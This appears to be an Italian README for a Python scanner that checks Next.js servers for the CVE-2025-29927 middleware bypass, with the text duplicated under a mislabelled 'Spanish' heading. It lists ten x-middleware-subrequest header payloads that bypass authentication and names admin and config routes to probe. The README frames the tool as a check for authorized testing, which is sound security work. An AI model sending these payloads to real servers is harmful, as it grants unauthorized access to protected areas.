
Questo script verifica la vulnerabilità CVE-2025-29927 nei server Next.js, testando più payload nell'header x-middleware-subrequest per rilevare accessi non autorizzati.
CVE-2025-29927 Checker
📌 Introduzione
Questo script verifica la vulnerabilità CVE-2025-29927 nei server Next.js testando più payload nell'header x-middleware-subrequest per rilevare accessi non autorizzati.
❓ Cos'è CVE-2025-29927?
CVE-2025-29927 è una vulnerabilità che consente di aggirare le restrizioni di sicurezza in Next.js, concedendo l'accesso a route sensibili senza autenticazione.
⚙️ Come Funziona lo Script
🔹 1. Importazione delle Librerie
Lo script utilizza:
🛠️ argparse - per la gestione degli argomenti.
🌐 requests - per inviare richieste HTTP.
⏳ time - per le pause tra i test.
🎨 colorama - per formattare l'output della console con i colori.
🔹 2. Elenco dei Payload
Lo script testa più payload in x-middleware-subrequest, progettati per aggirare le restrizioni di sicurezza. Esempio:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Route Sensibili
Lo script analizza le risposte per percorsi come:
/admin, /dashboard, /settings, /private, /config
🔹 4. Processo di Scansione
✅ Mostra un banner nella console.✅ Invia richieste HTTP con diversi payload.✅ Verifica se il server usa Next.js.✅ Rileva l'accesso a route sensibili e segnala le vulnerabilità.
🔹 5. Gestione degli Errori
Lo script gestisce le eccezioni per evitare interruzioni dovute a errori di connessione.
🚀 Esempio di Utilizzo
Esegui lo script con:
python script.py -t https://example.com/api/auth
📢 Dichiarazione di non responsabilità
Questo strumento è destinato esclusivamente a test etici e a un uso autorizzato. L'uso non autorizzato contro sistemi di terze parti è illegale.
===================SPAGNOLO===================
CVE-2025-29927 Checker
📌 Introduzione
Questo script verifica la vulnerabilità CVE-2025-29927 nei server Next.js, testando più payload nell'header x-middleware-subrequest per rilevare accessi non autorizzati.
❓ Cos'è CVE-2025-29927?
CVE-2025-29927 è una vulnerabilità che consente di aggirare le restrizioni di sicurezza in Next.js, concedendo l'accesso a route sensibili senza autenticazione.
⚙️ Come Funziona lo Script
🔹 1. Importazione delle Librerie
Lo script utilizza:
🛠️ argparse - per la gestione degli argomenti.
🌐 requests - per inviare richieste HTTP.
⏳ time - per le pause tra i test.
🎨 colorama - per formattare l'output della console con i colori.
🔹 2. Elenco dei Payload
Lo script testa più payload in x-middleware-subrequest, progettati per aggirare le restrizioni di sicurezza. Esempio:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Route Sensibili
Lo script analizza le risposte alla ricerca di percorsi come:
/admin, /dashboard, /settings, /private, /config
🔹 4. Processo di Scansione
✅ Mostra un banner nella console.✅ Invia richieste HTTP con diversi payload.✅ Verifica se il server usa Next.js.✅ Rileva l'accesso a route sensibili e segnala le vulnerabilità.
🔹 5. Gestione degli Errori
Lo script gestisce le eccezioni per evitare interruzioni dovute a errori di connessione.
🚀 Esempio di Utilizzo
Esegui lo script con:
python script.py -t https://example.com/api/auth
📢 Avviso Legale
Questo strumento è destinato esclusivamente a test etici e a un uso autorizzato. L'uso non autorizzato su sistemi di terze parti è illegale.